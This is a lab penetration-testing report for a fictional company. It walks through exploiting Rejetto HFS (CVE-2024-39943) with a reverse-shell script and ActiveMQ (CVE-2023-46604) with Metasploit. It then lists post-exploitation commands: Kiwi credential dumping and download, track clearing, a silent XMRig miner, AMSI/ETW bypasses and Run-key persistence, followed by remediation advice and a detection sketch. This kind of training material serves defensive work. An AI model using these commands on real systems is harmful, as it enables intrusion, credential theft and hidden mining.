Introduction

During the COVID-19 pandemic, many organizations faced cybersecurity challenges as they quickly adapted to remote work environments. “Tech Skibidi Inc.”, a medium-sized IT support and software development company, encountered vulnerabilities due to rapid technology deployment and insufficient security measures. This project aims to assess and strengthen their security posture through penetration testing and real-world attack simulations.

Objectives

  • Identify vulnerabilities within the office network.
  • Simulate real-world cyberattacks to evaluate system resilience.
  • Provide actionable recommendations to mitigate risks and improve security.

Use Case: SME Office Network Penetration Testing

Business Overview

Tech Skibidi Inc. employs 50 staff members across its main office and remote locations. Their network includes desktops, laptops, smartphones, printers, routers, and switches, primarily relying on Windows servers with some Linux systems.

Penetration Testing Goals

The project simulates attacks to uncover weaknesses and demonstrate their impact through:

  • Network scanning and enumeration.
  • Vulnerability assessment.
  • Exploitation and post-exploitation activities.

Pen-Test Environment Setup

Network Diagram

The network is divided into virtual machines for the attacker and target environments:

  • Attacking Machine: Kali/Black Arch/Parrot Linux.
  • Linux Server: Ubuntu 24.04 LTS.
  • Windows Server: 2019 with Active Directory.

Virtual Network Interfaces Configuration

  • VMnet1: Host-only (192.168.1.0/24)
  • VMnet2: Host-only (192.168.2.0/24)
  • VMnet3: Host-only (192.168.3.0/24)

Each device is assigned a unique IP address and configured to ensure isolation and security.


Tasks and Highlights

Task 1: Network Scanning and Enumeration

  • Tools used: Nmap to identify live hosts, open ports, and services.
  • Results: Enumeration revealed several exploitable vulnerabilities.

Task 2: Vulnerability Assessment

  • Tools used: OpenVAS and Nessus to detect vulnerabilities.
  • Findings: Key vulnerabilities identified were CVE-2024-39943 (Rejetto HFS) and CVE-2023-46604 (Apache ActiveMQ).

Exploitation: Step-by-Step Process

Exploitation 1: Rejetto HFS Vulnerability (CVE-2024-39943)

Step 1: Scan the Target

  1. Run nmap to identify open ports on the target Ubuntu server:
    nmap 192.168.1.129
  2. Confirm that port 443 is open and serving HTTP File Server (HFS).

Step 2: Login to the HFS Web Interface

  1. Access the target HFS server at:
    http://<Ubuntu IP>:443/
  2. Login using default credentials:
    • Username: guest
    • Password: guest

Step 3: Capture Session Cookies

  1. Open the browser’s Network Inspector and refresh the page.
  2. Copy the session cookies from the GET request headers.

Step 4: Exploit the Vulnerability

  1. Prepare a listening terminal on the attacker machine:
    netcat -lvp 4444
  2. Use hfs_vuln_script.py to exploit the server:
    python ./hfs_vuln_script.py
  3. Provide the following details in the script:
    • URL: Target HFS server URL.
    • Cookies: Captured session cookies.
    • Attacker IP: Local IP of the attacking machine.
    • Port: Listening port (e.g., 4444).

Step 5: Verify Exploitation

  • Check the terminal for root access to the Ubuntu server.

Exploitation 2: ActiveMQ Hello Kitty Vulnerability (CVE-2023-46604)

Step 1: Set Up the Target

  1. Install Apache ActiveMQ 5.18.2 on the Windows Server 2019 host.
  2. Start the server by running the .bat file.

Step 2: Prepare the Exploit

  1. On the Kali machine, download the exploit source code for CVE-2023-46604.
  2. Copy the exploit module to the Metasploit framework’s misc folder.

Step 3: Configure Metasploit

  1. Launch Metasploit:
    msfconsole
  2. Reload all modules so the new exploit module is picked up:
    reload_all
  3. Search for the module by CVE:
    search cve-2023-46604
  4. Select the module and set the required options:
    • RHOST: Target IP address.
    • LHOST: Attacker IP address.
    • SRVPORT: Local listening port.
    • FETCH_SRVPORT: Exploit port (different from SRVPORT).

Step 4: Execute the Exploit

  1. Launch the attack:
    exploit
  2. Start a Meterpreter session with the victim machine.

Task 4: Post-Exploitation Activities

1. Data Exfiltration

  1. Use Meterpreter (Kiwi) to dump credentials:
    load kiwi
    creds_all
  2. Save the credentials to a text file and download it to the attacker machine:
    download C:\\Users\\Public\\passwords.txt /home/kali/passwords.txt
  3. Clear tracks by deleting the text file from the victim machine:
    rm C:\\Users\\Public\\passwords.txt

2. Silent Cryptocurrency Mining

  1. Upload the Silent-XMRig-Miner to the victim machine:
    upload /home/kali/Downloads/SilentMiner.zip C:\\Desktop
  2. Execute the miner silently:
    Start-Process -FilePath "C:\\Desktop\\SilentMiner\\xmrig.exe" -Verb RunAs

3. Sliver C2 Framework

  1. Inject the ETW and AMSI bypasses into a process:
    inject-etw-bypass <pid>
    inject-amsi-bypass <pid>
  2. Create persistence through a Run key:
    registry write -T binary --path /tmp/GREEN_OVERSHOOT.exe --hive HKCU "Software\\Microsoft\\Windows\\CurrentVersion\\Run" updater
  3. Capture screenshots:
    screenshot

Summary

The penetration testing project successfully demonstrated the exploitation of critical vulnerabilities in Tech Skibidi Inc.’s network, including:

  • Remote code execution (CVE-2024-39943).
  • Privilege escalation and data exfiltration (CVE-2023-46604).
  • Covert cryptocurrency mining and persistent access.

Recommendations

  1. Patch outdated software (HFS, ActiveMQ).
  2. Enhance monitoring for unauthorized processes and file changes.
  3. Implement robust access controls and endpoint detection.
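As an added example (not part of the original project), the following Python sketches the host monitoring that recommendation 2 calls for, run over constructed sample events modelled on the post-exploitation activity described above: a known miner binary launched from an untrusted path, a Run-key write under HKCU, and deletion of a file in C:\Users\Public. The event field names, trusted-path list and sample records are assumptions, not real telemetry.

```python
from typing import Optional

# Constructed sample events (hypothetical, simplified Sysmon-like records; not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS01", "image": r"C:\Windows\System32\svchost.exe"},
    {"type": "process_create", "host": "WS01", "image": r"C:\Desktop\SilentMiner\xmrig.exe"},
    {"type": "registry_set", "host": "WS01",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater"},
    {"type": "file_delete", "host": "WS01", "path": r"C:\Users\Public\passwords.txt"},
    {"type": "process_create", "host": "WS02", "image": r"C:\Program Files\Git\bin\git.exe"},
]

# Assumed detection lists: known miner binaries, directories treated as trusted for
# process launches, the Run-key fragment used for persistence, and watched directories.
KNOWN_MINERS = {"xmrig.exe", "xmrig-notls.exe", "minerd.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
RUN_KEY_FRAGMENT = "\\microsoft\\windows\\currentversion\\run"
WATCHED_DIRS = ("c:\\users\\public\\",)


def classify(event: dict) -> Optional[tuple]:
    """Return (rule, host, detail) when an event matches a rule, else None."""
    kind, host = event["type"], event["host"]
    if kind == "process_create":
        image = event["image"]
        name = image.rsplit("\\", 1)[-1].lower()
        if name in KNOWN_MINERS:
            return ("miner-execution", host, image)
        if not image.lower().startswith(TRUSTED_DIRS):
            # Executables run from user-writable locations (e.g. a Desktop folder) get flagged.
            return ("untrusted-path-execution", host, image)
    elif kind == "registry_set" and RUN_KEY_FRAGMENT in event["key"].lower():
        return ("run-key-persistence", host, event["key"])
    elif kind == "file_delete" and event["path"].lower().startswith(WATCHED_DIRS):
        return ("watched-file-deleted", host, event["path"])
    return None


def detect(events) -> list:
    """Run every event through classify() and keep the hits, in event order."""
    return [hit for hit in map(classify, events) if hit]


if __name__ == "__main__":
    for rule, host, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {detail}")
```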

Citations